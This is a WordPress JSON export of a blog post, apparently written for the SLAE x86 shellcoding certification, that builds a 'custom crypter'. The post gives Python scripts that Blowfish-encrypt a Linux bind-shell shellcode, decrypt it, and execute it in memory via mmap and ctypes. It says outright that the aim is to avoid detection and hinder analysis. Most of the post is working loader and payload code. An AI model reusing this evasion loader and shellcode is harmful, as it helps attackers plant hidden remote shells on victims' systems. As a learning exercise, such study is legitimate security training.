{"id":251,"date":"2020-08-28T11:45:51","date_gmt":"2020-08-28T11:45:51","guid":{"rendered":"https:\/\/badbit.vc\/?p=251"},"modified":"2020-09-02T21:15:03","modified_gmt":"2020-09-02T21:15:03","slug":"custom-crypter","status":"publish","type":"post","link":"https:\/\/badbit.vc\/index.php\/2020\/08\/28\/custom-crypter\/","title":{"rendered":"Custom Crypter"},"content":{"rendered":"\n<p>Crypters are programs which take the payload as input and encrypt it with a strong cryptographic algorithm in order to avoid detection and make analysis a bit difficult. When delivering the encrypted payload to the target host, the payload is run through a decryption stub which decrypts the payload and executes the decrypted shellcode in memory.<\/p>\n\n\n\n<p>In this blog post, we will create our own crypter. We will encrypt our shellcode using the <em>Blowfish<\/em> algorithm leveraging Python and decrypt it again via a decrypter stub.<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>Schneier, the creator of the Blowfish algorithm, has stated that,<br><em>&#8220;Blowfish is unpatented, and will remain so in all countries. The algorithm is hereby placed in the&nbsp;public domain, and can be freely used by anyone.&#8221;<\/em><\/p><\/blockquote>\n\n\n\n<p>An interesting fact about the Blowfish algorithm: it was <strong>open-sourced<\/strong> during a time when cryptographic algorithms were proprietary. Open-sourcing Blowfish helped multiple technologies back then, saving them the tremendous amount of research time and effort required to build a crypto algorithm from scratch.<\/p>\n\n\n\n<p>Here are a few key points about the Blowfish algorithm:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>32 bits &lt; Key length &lt; 448 bits. 
Which is anything between 4 and 56 characters long<\/li><li>64-bit block size = 8 bytes<\/li><\/ul>\n\n\n\n<p>This information will serve as the baseline of our encryption routine.<\/p>\n\n\n\n<ol class=\"wp-block-list\"><li>The key should be more than 4 characters and less than 56<\/li><li>The length of the shellcode should be divisible by 8<\/li><\/ol>\n\n\n\n<p>We will use &#8220;sh3llc0de&#8221; as the key, &#8220;88888888&#8221; as the IV, and a bind shell shellcode as our payload.<\/p>\n\n\n\n<p>Following is the encryption routine:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import blowfish\ndef main():\n\tprint(\"\\n\")\n\tshellcode = b\"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\xb3\\x01\\x51\\x53\\x6a\\x02\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x89\\xc6\\xb0\\x66\\x31\\xdb\\x53\\x66\\x68\\x11\\x5c\\x66\\x6a\\x02\\x89\\xe1\\x6a\\x10\\x51\\x56\\x89\\xe1\\xb3\\x02\\xcd\\x80\\xb0\\x66\\x31\\xdb\\x53\\x56\\x89\\xe1\\xb3\\x04\\xcd\\x80\\xb0\\x66\\x31\\xdb\\x53\\x53\\x56\\x89\\xe1\\xb3\\x05\\xcd\\x80\\x89\\xc3\\xb9\\x03\\x00\\x00\\x00\\xb0\\x3f\\x49\\xcd\\x80\\x41\\xe2\\xf8\\x31\\xc9\\x89\\xca\\x51\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\xb0\\x01\\xcd\\x80\"\n\t\n\tlen_shellcode = len(shellcode)\n\t#length check\n\tif (len_shellcode % 8) != 0:\n\t\tprint(\"&#91;!] Shellcode length = %d, not a multiple of 8. Padding required.\" %len_shellcode)\n\t\t#calculate number of nops required\n\t\tnops = 8 - (len_shellcode % 8)\n\t\tprint(\"&#91;+] Appending %d NOPs to the shellcode\\n\" %nops)\n\t\tshellcode = shellcode+b'\\x90' * nops\n\telse:\n\t\tprint(\"&#91;+] Shellcode length = %d, multiple of 8. Padding not required.\" %len_shellcode)\n\tcrypter = blowfish.Cipher(b\"sh3llc0de\")\n\tiv = b'88888888'\n\tencrypted_shellcode = b\"\".join(crypter.encrypt_cbc(shellcode, iv))\n\t# raw_shellcode = \n\tprint(\"\\n\\n\")\n\tprint(\"&#91;+] Blowfish encryption completed. 
Printing encrypted shellcode to be fed to decrypter:\\n\")\n\tprint(encrypted_shellcode)\n\t# print(raw_shellcode)\t\n\tcrypted = \"\"\n\tshell_array = bytearray(encrypted_shellcode)\n\tfor x in bytearray(shell_array):\n\t\tcrypted += '\\\\x'\n\t\tcrypted += '%02x' % x\n\tprint(\"&#91;+] Raw encrypted shellcode:\")\n\tprint(crypted)\nif __name__ == '__main__':\n\tmain()<\/code><\/pre>\n\n\n\n<p>Below is the output of our encryption routine:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"183\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Encrypt-1024x183.jpg\" alt=\"\" class=\"wp-image-255\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Encrypt-1024x183.jpg 1024w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Encrypt-300x54.jpg 300w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Encrypt-768x137.jpg 768w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Encrypt-1536x274.jpg 1536w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Encrypt-850x152.jpg 850w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Encrypt.jpg 1900w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Decryption routine:<\/p>\n\n\n\n<p>The decryption routine will do the exact opposite of our encryption routine in order to decrypt our shellcode.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import blowfish\ndef main():\n\t\n\tencrypted_shellcode = b'7@\"\\x19\\xb1\\xaf\\xd8\\xb5\\xe7\\xe3\\x03\\x9b\\xfd\\x9cf\\xf5\\x8chto\\xb43^\\xa6W\\x8c\\x01\\xcfR\\x1e11\\x1d\\xca)\\x97\\x90\\xbdF\\xb8\\xb0l\\x15\\xe6(t,\\x8e\\x99\\x9a\\xee!u\\x19`\\n\\xd1\\xbe\\xea\\xb5\\xcd\\xa1\\xc6\\xa2\\x08\\xdbIi\\xe8\\xf9X\\xf16\\xb9\\xeb\\x15j0-\\xe4\\x81q\\xafW\\xb2\\x9d\\x86\\x81]S\\x9dSg\\xf0\\xce\\xe1\\xfc?\\xd99\\xf6\\xe4\\x86\\x1e\\xdd\\xc5\\xad_d\\x14\\x00n'\n\t\n\tdecrypter = blowfish.Cipher(b'sh3llc0de')\n\tiv = b'88888888'\n\tdecrypted_shellcode = 
b\"\".join(decrypter.decrypt_cbc(encrypted_shellcode, iv))\n\tprint(\"&#91;+] Decryption completed. Decrypted shellcode:\")\n\tprint(decrypted_shellcode)\n\tprint(\"\\n\")\n\t\n\tshellbytes = bytearray(decrypted_shellcode)\n\tdecrypted = \"\"\n\tfor x in bytearray(shellbytes):\n\t\tdecrypted += '\\\\x'\n\t\tdecrypted += '%02x' % x\n\tprint(\"&#91;+] Decrypted raw shellcode:\")\n\tprint(decrypted)\nif __name__ == '__main__':\n\tmain()\n<\/code><\/pre>\n\n\n\n<p>Below is the output of our decryption routine:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"97\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Decrypt-1024x97.jpg\" alt=\"\" class=\"wp-image-256\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Decrypt-1024x97.jpg 1024w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Decrypt-300x28.jpg 300w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Decrypt-768x73.jpg 768w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Decrypt-1536x145.jpg 1536w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Decrypt-850x81.jpg 850w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Decrypt.jpg 1890w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Now let&#8217;s try to execute our shellcode via Python itself. While researching this, I came across two ways to execute shellcode directly in Python. The first method is for Windows hosts and the second for Linux. We will play with the first method in future posts. <\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"http:\/\/www.debasish.in\/2012\/04\/execute-shellcode-using-python.html\">Calling standard Windows APIs via <strong><em>ctypes<\/em><\/strong><\/a> &#8211; VirtualAlloc(), CreateThread() etc. 
(Windows)<\/li><li><a rel=\"noreferrer noopener\" href=\"https:\/\/blog.sektor7.net\/#!res\/2018\/pure-in-memory-linux.md\" target=\"_blank\">Using ctypes and mmap<\/a> &#8211; Create an executable buffer, write our decrypted shellcode into it and call the buffer (Linux)<\/li><\/ul>\n\n\n\n<p>Below is the final code, which decrypts our encrypted shellcode, prints it on stdout and executes it.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import blowfish\nimport mmap\nimport ctypes\ndef main():\n\t\n\tencrypted_shellcode = b'7@\"\\x19\\xb1\\xaf\\xd8\\xb5\\xe7\\xe3\\x03\\x9b\\xfd\\x9cf\\xf5\\x8chto\\xb43^\\xa6W\\x8c\\x01\\xcfR\\x1e11\\x1d\\xca)\\x97\\x90\\xbdF\\xb8\\xb0l\\x15\\xe6(t,\\x8e\\x99\\x9a\\xee!u\\x19`\\n\\xd1\\xbe\\xea\\xb5\\xcd\\xa1\\xc6\\xa2\\x08\\xdbIi\\xe8\\xf9X\\xf16\\xb9\\xeb\\x15j0-\\xe4\\x81q\\xafW\\xb2\\x9d\\x86\\x81]S\\x9dSg\\xf0\\xce\\xe1\\xfc?\\xd99\\xf6\\xe4\\x86\\x1e\\xdd\\xc5\\xad_d\\x14\\x00n'\n\t\n\tdecrypter = blowfish.Cipher(b'sh3llc0de')\n\tiv = b'88888888'\n\tdecrypted_shellcode = b\"\".join(decrypter.decrypt_cbc(encrypted_shellcode, iv))\n\tprint(\"&#91;+] Decryption completed. Decrypted shellcode:\")\n\tprint(decrypted_shellcode)\n\tprint(\"\\n\")\n\tshellbytes = bytearray(decrypted_shellcode)\n\tdecrypted = \"\"\n\tfor x in bytearray(shellbytes):\n\t\tdecrypted += '\\\\x'\n\t\tdecrypted += '%02x' % x\n\tprint(\"&#91;+] Decrypted raw shellcode:\")\n\tprint(decrypted)\n\tmap_memory = mmap.mmap(0, len(decrypted_shellcode), flags=mmap.MAP_SHARED | mmap.MAP_ANONYMOUS, prot=mmap.PROT_WRITE | mmap.PROT_READ | mmap.PROT_EXEC)\n\tmap_memory.write(decrypted_shellcode)\n\t\n\tresult = ctypes.c_int64\n\targs = tuple()\n\tbuffered = ctypes.c_int.from_buffer(map_memory)\n\texecute = ctypes.CFUNCTYPE(result, *args)(ctypes.addressof(buffered))\n\texecute()\nif __name__ == '__main__':\n\tmain()<\/code><\/pre>\n\n\n\n<p>And there we have our custom encrypter and decrypter ready. 
Below is the output:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"532\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Execution-1024x532.jpg\" alt=\"\" class=\"wp-image-273\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Execution-1024x532.jpg 1024w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Execution-300x156.jpg 300w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Execution-768x399.jpg 768w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Execution-1536x798.jpg 1536w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Execution-850x441.jpg 850w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Execution.jpg 1573w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>And this concludes our series!<\/p>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<p>This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:<br><a href=\"http:\/\/securitytube-training.com\/online-courses\/securitytube-linux-assembly-expert\/\">http:\/\/securitytube-training.com\/online-courses\/securitytube-linux-assembly-expert\/<\/a><\/p>\n\n\n\n<p>Student ID: PA-14690<\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/bad-bit\/SLAE_x86\/tree\/master\/Custom%20Encrypter\" target=\"_blank\" rel=\"noreferrer noopener\">Custom Encrypter Github Repo<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Crypters are programs which take the payload as input and encrypt it with a strong cryptographic algorithm in order to avoid detection and make analysis a bit difficult. 
When delivering the encrypted payload to the target host, the payload is run through a decryption stub which decrypts the payload and executes the decrypted shellcode in&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,4],"tags":[7,5,8,6],"class_list":["post-251","post","type-post","status-publish","format-standard","hentry","category-shellcoding","category-slae-x86","tag-linux","tag-shellcode","tag-slae","tag-x86"],"_links":{"self":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts\/251","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/comments?post=251"}],"version-history":[{"count":11,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts\/251\/revisions"}],"predecessor-version":[{"id":457,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts\/251\/revisions\/457"}],"wp:attachment":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/media?parent=251"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/categories?post=251"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/tags?post=251"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}